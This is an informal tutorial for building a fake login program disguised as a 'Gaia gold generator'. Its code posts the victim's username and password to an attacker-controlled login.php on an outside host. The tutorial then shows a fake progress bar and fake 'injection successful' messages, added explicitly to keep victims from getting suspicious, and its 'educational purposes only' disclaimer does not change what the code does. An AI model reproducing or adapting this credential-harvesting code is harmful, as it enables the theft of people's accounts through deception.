Ok in this tutorial i will be teaching you how to make a fake login program (FLP) its like the website counter part but u can dress it up like a gold generator or something else! use your imagination!

You need

2 Windows (Window1 & Login)

Ok Lets double click Login

add 2 edit-fields & a bevel button

Now add a socket to the window name it socket2 (make sure the super is set to HTTPSocket)

Add this code to the Action Event of the Bevel Button
  Dim form as Dictionary
  Dim Socket2 as New HTTPSocket
  // create and populate the form object
  form = New Dictionary
  form.value("username") = Editfield1.Text //username field
  form.value("password") = Editfield2.Text //password field
  // setup the socket to POST the form
  Socket2.setFormData form
  Socket2.post "http://h1.ripway.com/******/login.php" //You need to edit this link to your FLP login.php (any login.php used in a FLP will work)
  login.close // this closes your login window
  window1.show // this opens window1 aka your fake app
You have to edit in your login link should be self explanatory

now make sure for the password field aka editfield 2 you set it to being a password field so the pass shows up like * or °

your app should look like this as of now (the green thing is a socket XD i didnt want to have to load the app up)

for the fake app part in window1 i used a popupmenu and listed amounts of gold that u can get (its fake duh)
well to keep people from getting suspicious i added a button another bevel button

controls i used in window1


with this in its action event
  ProgressBar1.Value = 0
  ProgressBar1.Visible = True
  if ProgressBar1.value = 0 then
    ProgressBar1.Value = 10
  End if
  ProgressBar1.Value = 10
  ProgressBar1.Value = 20
  ProgressBar1.Value = 50
  ProgressBar1.Value = 65
  ProgressBar1.Value = 35
  ProgressBar1.Value = 72
  ProgressBar1.Value = 92
  ProgressBar1.Value = 98
  ProgressBar1.Value = 99
  ProgressBar1.Value = 99
  ProgressBar1.Value = 99
  ProgressBar1.Value = 99
  ProgressBar1.Value = 99
  ProgressBar1.Value = 99
  ProgressBar1.Value = 100
and this in the close event
  if ProgressBar1.Value = 100 then
    MsgBox"Script Sucsessfuly Injected!"
    MsgBox"Please allow 24 hours to insure that the Gaia gold injection was sucsessful."
make the GUI look good add a background pic or something and u are set XD but please remember this is for educational purposes only to teach you how to program and i am not responsible for any thing you use this for

You can also use this to log your passwords to a text file on the net so you do not forget them u can figure that part out ^^

login.php code

-Tyler777 aka Jester